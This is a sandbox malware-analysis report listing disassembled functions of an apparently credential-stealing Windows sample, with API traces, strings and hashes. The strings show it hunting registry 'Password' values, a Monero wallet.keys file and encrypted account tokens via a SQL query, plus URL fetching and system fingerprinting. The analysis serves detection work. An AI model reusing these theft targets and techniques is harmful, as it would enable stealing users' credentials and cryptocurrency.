Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\$6
API String ID: 1544550907-1570250246
Opcode ID: 14e2577ab4503efef5197481779491e1420f8146ca8f02b7aa7cb7be705484e3
Instruction ID: e7d75af0a8dad5e6672adc0dc126fe16b35dcfc26427bb85886183c1fed48ae2
Opcode Fuzzy Hash: 14e2577ab4503efef5197481779491e1420f8146ca8f02b7aa7cb7be705484e3
Instruction Fuzzy Hash: A84173B1D04258ABDB11DB94DC45FDEBBB8AB18701F100199F9057B290E7746A48CBA5

Function 003475D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003472D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0034733A
Part of subcall function 003472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003473B1
Part of subcall function 003472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0034740D
Part of subcall function 003472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00347452
Part of subcall function 003472D0: HeapFree.KERNEL32(00000000), ref: 00347459

lstrcat.KERNEL32(35B6A020,003617FC), ref: 00347606
lstrcat.KERNEL32(35B6A020,00000000), ref: 00347648
lstrcat.KERNEL32(35B6A020, : ), ref: 0034765A
lstrcat.KERNEL32(35B6A020,00000000), ref: 0034768F
lstrcat.KERNEL32(35B6A020,00361804), ref: 003476A0
lstrcat.KERNEL32(35B6A020,00000000), ref: 003476D3
lstrcat.KERNEL32(35B6A020,00361808), ref: 003476ED
task.LIBCPMTD ref: 003476FB

Strings

: , xrefs: 0034764E

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID: :
API String ID: 2677904052-3653984579
Opcode ID: 8c754faf2ad67d9700c0d82f8a382673a3486beb66313b20ea6833a788e22bb1
Instruction ID: 0fc42ac95f7768f061496f6957e38b26fc4b05c3fd6cec1fc74ed75e3bd5d0ba
Opcode Fuzzy Hash: 8c754faf2ad67d9700c0d82f8a382673a3486beb66313b20ea6833a788e22bb1
Instruction Fuzzy Hash: 56316B71D00109DBDB06EBA4DC85DEE73B9FB64301B14410AF502BB295EB38A94ADB61

Function 003472D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0034733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003473B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0034740D
GetProcessHeap.KERNEL32(00000000,?), ref: 00347452
HeapFree.KERNEL32(00000000), ref: 00347459
task.LIBCPMTD ref: 00347555

Strings

Password, xrefs: 00347401

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetask
String ID: Password
API String ID: 775622407-3434357891
Opcode ID: 2985e877dd5f8ee819c8255b22441a18c0d65ad4be52eff404eb0dcf32a7741b
Instruction ID: 110d6a954d6ccf0d59b68c102cc5e418409f4dd9f7835e4a00ada91fd56a6b09
Opcode Fuzzy Hash: 2985e877dd5f8ee819c8255b22441a18c0d65ad4be52eff404eb0dcf32a7741b
Instruction Fuzzy Hash: FC611BB591415C9BDB25DB50CC45BEAB7F8BF44300F0085E9E649AA241DBB06BC9CFA1

Function 0034BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

lstrlen.KERNEL32(00000000), ref: 0034BC9F

Part of subcall function 00358E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0034BCCD
lstrlen.KERNEL32(00000000), ref: 0034BDA5
lstrlen.KERNEL32(00000000), ref: 0034BDB9

Strings

AccountTokens, xrefs: 0034BB49
AccountId, xrefs: 0034BCC4
SELECT service, encrypted_token FROM token_service, xrefs: 0034BBEB
AccountTokens, xrefs: 0034BABA

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: 2607124d12732631e5eb1718ba3879ce606e73177d1f3986b1a1ac823fe00c18
Instruction ID: 84ab634ebc210bc8fc7e077252520eba4bcc0169042389bdc9e9905ca23b7e6d
Opcode Fuzzy Hash: 2607124d12732631e5eb1718ba3879ce606e73177d1f3986b1a1ac823fe00c18
Instruction Fuzzy Hash: B4B154719105089BDB06FBA0CC96EEE7778BF54301F404259F907BA1A1EF346A4DEB62

Function 00344FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00344FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00344FD1
InternetOpenA.WININET(00360DDF,00000000,00000000,00000000,00000000), ref: 00344FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00345011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00345041
InternetCloseHandle.WININET(?), ref: 003450B9
InternetCloseHandle.WININET(?), ref: 003450C6

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: a3f18318c6ac97ed7eb67e3ab4033b86eadfbb09cff4001dadebae0354f24483
Instruction ID: 6ae5998daf7a4b84edbbca0734631e15b9ab992d39dc115eb106eae47c4c4140
Opcode Fuzzy Hash: a3f18318c6ac97ed7eb67e3ab4033b86eadfbb09cff4001dadebae0354f24483
Instruction Fuzzy Hash: 343104B4A00218ABEB20CF54DC85BDDB7B4EB48704F5081D9EA09B7281D7706E899F99

Function 00358100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0136DD78,00000000,?,00360E2C,00000000,?,00000000), ref: 00358130
RtlAllocateHeap.NTDLL(00000000), ref: 00358137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00358158
wsprintfA.USER32 ref: 003581AC

Strings

%d MB, xrefs: 003581A3
@, xrefs: 0035814D

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2922868504-3474575989
Opcode ID: cf6decc5483efa2b29a07b9b965c857080c4ee72954abf435fd66079df15c706
Instruction ID: 68399cfc7c9211d717bc17adf2d5ead759dc4a2bacf08861aadc1e5aa5b51d57
Opcode Fuzzy Hash: cf6decc5483efa2b29a07b9b965c857080c4ee72954abf435fd66079df15c706
Instruction Fuzzy Hash: 4A2160B1E44208ABEB10DFD4CC49FAFB7B8FB44B01F104509FA05BB290D77859058BA5

Function 003583DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00358426
wsprintfA.USER32 ref: 00358459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0035847B
RegCloseKey.ADVAPI32(00000000), ref: 0035848C
RegCloseKey.ADVAPI32(00000000), ref: 00358499

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

RegQueryValueExA.KERNEL32(00000000,0136DE08,00000000,000F003F,?,00000400), ref: 003584EC
lstrlen.KERNEL32(?), ref: 00358501
RegQueryValueExA.KERNEL32(00000000,0136DD00,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00360B34), ref: 00358599
RegCloseKey.KERNEL32(00000000), ref: 00358608
RegCloseKey.ADVAPI32(00000000), ref: 0035861A

Strings

%s\%s, xrefs: 0035844D

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 5dde142ce286f0815b4b5172cc5ed08670a44f0222056832b40ec3c8462ca479
Instruction ID: 26ce0b269e35e1d2f8a6aca70e25c1df1f5741084f08d1fa83ef5b76b057e43a
Opcode Fuzzy Hash: 5dde142ce286f0815b4b5172cc5ed08670a44f0222056832b40ec3c8462ca479
Instruction Fuzzy Hash: 0D211D719002189BEB24DB54DC85FE9B7B8FB48701F00C5D9EA09A6150DF71AA89DFE4

Function 00357690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003576A4
RtlAllocateHeap.NTDLL(00000000), ref: 003576AB
RegOpenKeyExA.KERNEL32(80000002,0135B930,00000000,00020119,00000000), ref: 003576DD
RegQueryValueExA.KERNEL32(00000000,0136DDF0,00000000,00000000,?,000000FF), ref: 003576FE
RegCloseKey.ADVAPI32(00000000), ref: 00357708

Strings

Windows 11, xrefs: 003576BD

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
